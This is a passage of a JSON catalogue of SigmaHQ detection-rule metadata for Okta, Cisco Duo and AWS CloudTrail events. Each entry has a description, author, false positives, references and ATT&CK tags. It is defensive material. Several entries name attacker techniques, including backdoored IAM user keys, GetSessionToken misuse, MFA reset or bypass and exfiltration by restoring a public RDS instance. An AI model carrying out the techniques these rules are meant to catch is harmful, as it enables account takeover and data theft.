"refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", "value": "Okta Application Modified or Deleted" }, { "description": "Detects when a API Token is revoked.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_api_token_revoked.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" ], "tags": [ "attack.impact" ] }, "uuid": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", "value": "Okta API Token Revoked" }, { "description": "Detects when an Okta end-user reports activity by their account as being potentially suspicious.", "meta": { "author": "kelnage", "creation_date": "2023-09-07", "falsepositive": [ "If an end-user incorrectly identifies normal activity as suspicious." ], "filename": "okta_suspicious_activity_enduser_report.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_suspicious_activity_enduser_report.yml" ], "tags": [ "attack.resource-development", "attack.t1586.003" ] }, "related": [ { "dest-uuid": "3d52e51e-f6db-4719-813c-48002a99f43a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07e97cc6-aed1-43ae-9081-b3470d2367f1", "value": "Okta Suspicious Activity Reported by End-user" }, { "description": "Detects when an security threat is detected in Okta.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_security_threat_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", "value": "Okta Security Threat Detected" }, { "description": "Detects when an application Sign-on Policy is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_application_sign_on_policy_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "8f668cc4-c18e-45fe-ad00-624a981cf88a", "value": "Okta Application Sign-On Policy Modified or Deleted" }, { "description": "Detects when a API token is created", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Legitimate creation of an API token by authorized users" ], "filename": "okta_api_token_created.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "19951c21-229d-4ccb-8774-b993c3ff3c5c", "value": "Okta API Token Created" }, { "description": "Detects when an user account is locked out.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_user_account_locked_out.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", "value": "Okta User Account Locked Out" }, { "description": "Detects when an Network Zone is Deactivated or Deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_network_zone_deactivated_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "9f308120-69ed-4506-abde-ac6da81f4310", "value": "Okta Network Zone Deactivated or Deleted" }, { "description": "Detects when Okta identifies new activity in the Admin Console.", "meta": { "author": "kelnage", "creation_date": "2023-09-07", "falsepositive": [ "When an admin begins using the Admin Console and one of Okta's heuristics incorrectly identifies the behavior as being unusual." ], "filename": "okta_new_behaviours_admin_console.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_new_behaviours_admin_console.yml" ], "tags": [ "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9", "value": "Okta New Admin Console Behaviours" }, { "description": "Detects when Okta FastPass prevents a known phishing site.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2023-05-07", "falsepositive": [ "Unlikely" ], "filename": "okta_fastpass_phishing_detection.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://sec.okta.com/fastpassphishingdetection", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_fastpass_phishing_detection.yml" ], "tags": [ "attack.initial-access", "attack.t1566" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e", "value": "Okta FastPass Phishing Detection" }, { "description": "Detects when a new admin role assignment is created. Which could be a sign of privilege escalation or persistence", "meta": { "author": "Nikita Khalimonenkov", "creation_date": "2023-01-19", "falsepositive": [ "Legitimate creation of a new admin role assignment" ], "filename": "okta_admin_role_assignment_created.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assignment_created.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "139bdd4b-9cd7-49ba-a2f4-744d0a8f5d8c", "value": "Okta Admin Role Assignment Created" }, { "description": "Detects when unauthorized access to app occurs.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "User might of believe that they had access." ], "filename": "okta_unauthorized_access_to_app.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" ], "tags": [ "attack.impact" ] }, "uuid": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", "value": "Okta Unauthorized Access to App" }, { "description": "Detects when an Okta policy is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Okta Policies being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "okta_policy_modified_or_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "1667a172-ed4c-463c-9969-efd92195319a", "value": "Okta Policy Modified or Deleted" }, { "description": "Detects when an attempt at deactivating or resetting MFA.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-21", "falsepositive": [ "If a MFA reset or deactivated was performed by a system administrator." ], "filename": "okta_mfa_reset_or_deactivated.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" ], "tags": [ "attack.persistence", "attack.credential-access", "attack.defense-evasion", "attack.t1556.006" ] }, "related": [ { "dest-uuid": "b4409cd8-0da9-46e1-a401-a241afd4d1cc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", "value": "Okta MFA Reset or Deactivated" }, { "description": "Detects when an Okta user session starts where the user is behind an anonymising proxy service.", "meta": { "author": "kelnage", "creation_date": "2023-09-07", "falsepositive": [ "If a user requires an anonymising proxy due to valid justifications." ], "filename": "okta_user_session_start_via_anonymised_proxy.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_session_start_via_anonymised_proxy.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.006" ] }, "related": [ { "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bde30855-5c53-4c18-ae90-1ff79ebc9578", "value": "Okta User Session Start Via An Anonymising Proxy Service" }, { "description": "Detects when a successful MFA authentication occurs due to the use of a bypass code.\nA bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as \"backup codes,\" so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.\n", "meta": { "author": "Nikita Khalimonenkov", "creation_date": "2024-04-17", "falsepositive": [ "Legitimate user that was assigned on purpose to a bypass group" ], "filename": "cisco_duo_mfa_bypass_via_bypass_code.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "cisco", "refs": [ "https://duo.com/docs/adminapi#logs", "https://help.duo.com/s/article/6327?language=en_US", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/cisco/duo/cisco_duo_mfa_bypass_via_bypass_code.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.initial-access" ] }, "uuid": "6f7e1c10-2dc9-4312-adb6-9574ff09a5c8", "value": "Cisco Duo Successful MFA Authentication Via Bypass Code" }, { "description": "Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account.\n", "meta": { "author": "jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "Legitimate use of ACLs to enable customer and staff access from the public internet into a public VPC" ], "filename": "aws_cloudtrail_new_acl_entries.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_new_acl_entries.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e1f7febb-7b94-4234-b5c6-00fb8500f5dd", "value": "New Network ACL Entry Added" }, { "description": "Identifies when an ElastiCache security group has been modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_elasticache_security_group_modified_or_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc", "value": "AWS ElastiCache Security Group Modified or Deleted" }, { "description": "Detects an instance of an SES identity being deleted via the \"DeleteIdentity\" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities", "meta": { "author": "Janantha Marasinghe", "creation_date": "2022-12-13", "falsepositive": [ "Unknown" ], "filename": "aws_delete_identity.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_delete_identity.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "20f754db-d025-4a8f-9d74-e0037e999a9a", "value": "SES Identity Has Been Deleted" }, { "description": "Detects AWS root account usage", "meta": { "author": "vitaliy0x1", "creation_date": "2020-01-21", "falsepositive": [ "AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html" ], "filename": "aws_root_account_usage.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_root_account_usage.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add", "value": "AWS Root Credentials" }, { "description": "Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_sts_getsessiontoken_misuse.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", "https://github.com/elastic/detection-rules/pull/1213", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_sts_getsessiontoken_misuse.yml" ], "tags": [ "attack.lateral-movement", "attack.privilege-escalation", "attack.t1548", "attack.t1550", "attack.t1550.001" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f005e783-57d4-4837-88ad-dbe7faee1c51", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b45ab1d2-712f-4f01-a751-df3826969807", "value": "AWS STS GetSessionToken Misuse" }, { "description": "Detects when an account makes changes to the ingress or egress rules of a security group.\nThis can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.\n", "meta": { "author": "jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "New VPCs and Subnets being setup requiring a different security profile to those already defined", "A single port being opened for a new service that is known to be deploying", "Administrators closing unused ports to reduce the attack surface" ], "filename": "aws_cloudtrail_security_group_change_ingress_egress.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_ingress_egress.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6fb77778-040f-4015-9440-572aa9b6b580", "value": "Ingress/Egress Security Group Modification" }, { "description": "Detects possible suspicious glue development endpoint activity.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-10-03", "falsepositive": [ "Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_passed_role_to_glue_development_endpoint.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", "value": "AWS Glue Development Endpoint Activity" }, { "description": "Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-15", "falsepositive": [ "Unknown" ], "filename": "aws_efs_fileshare_mount_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964", "value": "AWS EFS Fileshare Mount Modified or Deleted" }, { "description": "Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.", "meta": { "author": "faloker", "creation_date": "2020-02-12", "falsepositive": [ "Unknown" ], "filename": "aws_rds_public_db_restore.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_rds_public_db_restore.yml" ], "tags": [ "attack.exfiltration", "attack.t1020" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599", "value": "Restore Public AWS RDS Instance" }, { "description": "Identifies when an EKS cluster is created or deleted.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-16", "falsepositive": [ "EKS Cluster being created or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_eks_cluster_created_or_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://any-api.com/amazonaws_com/eks/docs/API_Description", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_eks_cluster_created_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", "value": "AWS EKS Cluster Created or Deleted" }, { "description": "Detects the addition of a new network route to a route table in AWS.\n", "meta": { "author": "jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "New VPC Creation requiring setup of a new route table", "New subnets added requiring routing setup" ], "filename": "aws_cloudtrail_new_route_added.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_new_route_added.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c803b2ce-c4a2-4836-beae-b112010390b1", "value": "New Network Route Added" }, { "description": "Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.", "meta": { "author": "Austin Songer", "creation_date": "2021-09-22", "falsepositive": [ "Automated processes that uses Terraform may lead to false positives.", "SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_susp_saml_activity.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_susp_saml_activity.yml" ], "tags": [ "attack.initial-access", "attack.t1078", "attack.lateral-movement", "attack.t1548", "attack.privilege-escalation", "attack.t1550", "attack.t1550.001" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f005e783-57d4-4837-88ad-dbe7faee1c51", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", "value": "AWS Suspicious SAML Activity" }, { "description": "Looks for potential enumeration of AWS buckets via ListBuckets.", "meta": { "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "creation_date": "2023-01-06", "falsepositive": [ "Administrators listing buckets, it may be necessary to filter out users who commonly conduct this activity." ], "filename": "aws_enum_buckets.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html", "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/", "https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_enum_buckets.yml" ], "tags": [ "attack.discovery", "attack.t1580" ] }, "related": [ { "dest-uuid": "57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f305fd62-beca-47da-ad95-7690a0620084", "value": "Potential Bucket Enumeration on AWS" }, { "description": "Detects S3 Browser utility creating IAM User or AccessKey.", "meta": { "author": "daniel.bohannon@permiso.io (@danielhbohannon)", "creation_date": "2023-05-17", "falsepositive": [ "Valid usage of S3 Browser for IAM User and/or AccessKey creation" ], "filename": "aws_iam_s3browser_user_or_accesskey_creation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1059.009", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db014773-d9d9-4792-91e5-133337c0ffee", "value": "AWS IAM S3Browser User or AccessKey Creation" }, { "description": "Detects AWS API key creation for a user by another user.\nBackdoored users can be used to obtain persistence in the AWS environment.\nAlso with this alert, you can detect a flow of AWS keys in your org.\n", "meta": { "author": "faloker", "creation_date": "2020-02-12", "falsepositive": [ "Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)", "AWS API keys legitimate exchange workflows" ], "filename": "aws_iam_backdoor_users_keys.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_backdoor_users_keys.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", "value": "AWS IAM Backdoor Users Keys" }, { "description": "Detects when an ElastiCache security group has been created.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_elasticache_security_group_created.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_elasticache_security_group_created.yml" ], "tags": [ "attack.persistence", "attack.t1136", "attack.t1136.003" ] }, "related": [ { "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7", "value": "AWS ElastiCache Security Group Created" }, { "description": "Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.", "meta": { "author": "Elastic, Austin Songer @austinsonger", "creation_date": "2021-07-22", "falsepositive": [ "A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_route_53_domain_transferred_lock_disabled.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", 